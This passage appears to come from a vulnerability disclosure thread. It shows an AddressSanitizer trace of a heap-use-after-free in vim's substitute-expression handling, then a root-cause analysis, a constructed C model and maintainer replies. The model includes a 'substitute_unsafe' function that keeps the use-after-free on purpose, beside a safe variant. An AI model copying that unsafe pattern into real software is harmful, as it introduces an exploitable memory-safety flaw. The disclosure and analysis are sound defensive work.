#3 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#4 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#5 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
#6 0xc0aeec in call_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:3499:11
#7 0xc09c18 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1778:8
#8 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#9 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#10 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#11 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#12 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#13 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#14 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#15 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#16 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#17 0xc09526 in get_func_tv /home/alkyne/fuzzing/vim-asan/src/userfunc.c:1724:6
#18 0x60b95b in eval_func /home/alkyne/fuzzing/vim-asan/src/eval.c:2103:8
#19 0x60a091 in eval7 /home/alkyne/fuzzing/vim-asan/src/eval.c:3746:9
#20 0x60f92b in eval7t /home/alkyne/fuzzing/vim-asan/src/eval.c:3426:11
#21 0x60ebb5 in eval6 /home/alkyne/fuzzing/vim-asan/src/eval.c:3218:9
#22 0x60d7ba in eval5 /home/alkyne/fuzzing/vim-asan/src/eval.c:2981:9
#23 0x60ce79 in eval4 /home/alkyne/fuzzing/vim-asan/src/eval.c:2834:9
#24 0x60bd6a in eval3 /home/alkyne/fuzzing/vim-asan/src/eval.c:2695:9
#25 0x5ebc62 in eval2 /home/alkyne/fuzzing/vim-asan/src/eval.c:2569:9
#26 0x5ebc62 in eval1 /home/alkyne/fuzzing/vim-asan/src/eval.c:2415:9
#27 0x5f9759 in eval0_retarg /home/alkyne/fuzzing/vim-asan/src/eval.c:2332:11
#28 0x5ee7d7 in eval0 /home/alkyne/fuzzing/vim-asan/src/eval.c:2307:12
#29 0x5ee7d7 in eval_to_string_eap /home/alkyne/fuzzing/vim-asan/src/eval.c:530:9
#30 0x96eae8 in vim_regsub_both /home/alkyne/fuzzing/vim-asan/src/regexp.c:2070:17
#31 0x96f0b8 in vim_regsub_multi /home/alkyne/fuzzing/vim-asan/src/regexp.c:1941:14
#32 0x66b761 in ex_substitute /home/alkyne/fuzzing/vim-asan/src/ex_cmds.c:4404:12
#33 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#34 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#35 0xc10279 in call_user_func /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2805:2
#36 0xc10279 in call_user_func_check /home/alkyne/fuzzing/vim-asan/src/userfunc.c:2952:2
previously allocated by thread T0 here:
#0 0x49720d in malloc (/home/alkyne/fuzzing/vim-asan/src/vim+0x49720d)
#1 0x4c6d47 in lalloc /home/alkyne/fuzzing/vim-asan/src/alloc.c:248:11
#2 0x67f55c in do_one_cmd /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:2567:2
#3 0x67f55c in do_cmdline /home/alkyne/fuzzing/vim-asan/src/ex_docmd.c:993:17
#4 0xa71e3d in do_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1512:5
#5 0xa704cd in cmd_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1098:14
#6 0xa704cd in ex_source /home/alkyne/fuzzing/vim-asan/src/scriptfile.c:1124:2
#7 0xd97f97 in exe_commands /home/alkyne/fuzzing/vim-asan/src/main.c:3091:2
#8 0xd97f97 in vim_main2 /home/alkyne/fuzzing/vim-asan/src/main.c:774:2
#9 0xd955a9 in main /home/alkyne/fuzzing/vim-asan/src/main.c:426:12
#10 0x7fec9dfe80b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-use-after-free /home/alkyne/fuzzing/vim-asan/src/charset.c:1474:12 in skipwhite
Shadow bytes around the buggy address:
0x0c0c7fff8180: fa fa fa fa 00 00 00 00 00 00 03 fa fa fa fa fa
0x0c0c7fff8190: 00 00 00 00 00 00 06 fa fa fa fa fa 00 00 00 00
0x0c0c7fff81a0: 00 00 04 fa fa fa fa fa 00 00 00 00 00 00 00 fa
0x0c0c7fff81b0: fa fa fa fa 00 00 00 00 00 00 00 fa fa fa fa fa
0x0c0c7fff81c0: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
=>0x0c0c7fff81d0: fd fd[fd]fd fa fa fa fa 00 00 00 00 00 00 07 fa
0x0c0c7fff81e0: fa fa fa fa 00 00 00 00 00 00 07 fa fa fa fa fa
0x0c0c7fff81f0: 00 00 00 00 00 00 07 fa fa fa fa fa 00 00 00 00
0x0c0c7fff8200: 00 00 07 fa fa fa fa fa 00 00 00 00 00 00 07 fa
0x0c0c7fff8210: fa fa fa fa 00 00 00 00 00 00 07 fa fa fa fa fa
0x0c0c7fff8220: 00 00 00 00 00 00 07 fa fa fa fa fa 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
Shadow gap: cc
==6580==ABORTING
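Reading the two stacks together: the faulting read is skipwhite called from get_func_tv (userfunc.c:1803) right after a user-function call has returned, and the "freed by" stack shows that the user function ran an ex_substitute of its own (frame #1, ex_cmds.c:3789) while the outer :s was still evaluating its \= expression. The 57-byte region is therefore a string the outer evaluator was still walking when the nested :s freed it. The C program below is an added, constructed model of that re-entrancy problem; it is not vim's code, and prev_sub, extract_rep, walk_expr, substitute_unsafe and substitute_safe are invented names with a toy grammar. It shows the unsafe pattern beside one defensive form: evaluating from a private copy so a nested command cannot free the buffer under the parser.

```c
#include <ctype.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed model (not vim's code): the editor keeps the replacement text of
 * the last :s command in one heap string. A nested :s frees and replaces it,
 * which is the free the report's "freed by" stack shows inside ex_substitute. */
static char *prev_sub = NULL;

/* Accessor so a caller can inspect the remembered string. */
const char *current_prev_sub(void) { return prev_sub; }

static char *dup_range(const char *s, size_t n)
{
    char *out = malloc(n + 1);
    if (out == NULL) abort();
    memcpy(out, s, n);
    out[n] = '\0';
    return out;
}

/* "s/pat/rep[/]" -> heap copy of rep. "s/" alone yields "" like the PoC's
 * patternless :s. Returns NULL when there is no delimiter at all. */
static char *extract_rep(const char *cmd)
{
    const char *d1 = strchr(cmd, '/');
    if (d1 == NULL) return NULL;
    const char *d2 = strchr(d1 + 1, '/');
    if (d2 == NULL) return dup_range("", 0);
    const char *end = strchr(d2 + 1, '/');
    return dup_range(d2 + 1, end ? (size_t)(end - (d2 + 1)) : strlen(d2 + 1));
}

typedef int (*subst_fn)(const char *cmd);

/* Minimal stand-in for the expression evaluator: identifiers are "function
 * calls", and the identifier "nested" behaves like the PoC's user function by
 * running an inner :s. Returns how many calls were seen. */
static int walk_expr(const char *p, subst_fn subst)
{
    int calls = 0;
    while (*p != '\0') {
        if (isalpha((unsigned char)*p)) {
            const char *start = p;
            while (isalnum((unsigned char)*p)) p++;
            calls++;
            if (p - start == 6 && strncmp(start, "nested", 6) == 0)
                subst("s/x/y");   /* re-entrant :s, frees prev_sub */
            /* The skipwhite step after the call returns: in the unsafe variant
             * p still points into the buffer the nested :s just freed. */
            while (*p == ' ') p++;
        } else {
            p++;
        }
    }
    return calls;
}

/* Unsafe: evaluates the "\=" expression directly inside prev_sub. Not called
 * below; built with -fsanitize=address it yields a heap-use-after-free report. */
int substitute_unsafe(const char *cmd)
{
    char *rep = extract_rep(cmd);
    if (rep == NULL) return -1;
    free(prev_sub);
    prev_sub = rep;
    if (strncmp(prev_sub, "\\=", 2) != 0) return 0;
    return walk_expr(prev_sub + 2, substitute_unsafe);
}

/* Safe: the evaluator walks a private copy that no nested :s can free, and
 * releases that copy itself when evaluation is done. */
int substitute_safe(const char *cmd)
{
    char *rep = extract_rep(cmd);
    if (rep == NULL) return -1;
    free(prev_sub);
    prev_sub = rep;
    if (strncmp(prev_sub, "\\=", 2) != 0) return 0;
    char *expr = dup_range(prev_sub + 2, strlen(prev_sub + 2));
    int calls = walk_expr(expr, substitute_safe);
    free(expr);
    return calls;
}

int main(void)
{
    int calls = substitute_safe("s/a/\\=f(1, nested(), g())");
    printf("calls=%d remembered=\"%s\"\n", calls, current_prev_sub());
    return 0;
}
```

The sample expression mirrors the PoC's shape: a call list in which one call re-enters :s. After the nested call the remembered string has already been replaced by "y", yet the safe variant finishes parsing all three calls because it never reads prev_sub again; the unsafe variant resumes on the dangling pointer, which is the read the ASAN report flags at charset.c:1474.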
We are processing your report and will contact the vim team within 24 hours.
a year ago
We have contacted a member of the vim team and are waiting to hear back
a year ago
I can reproduce the problem. The POC can be further simplified, I'll use that in a test. Next time, please try to reduce the POC as much as you can to save time.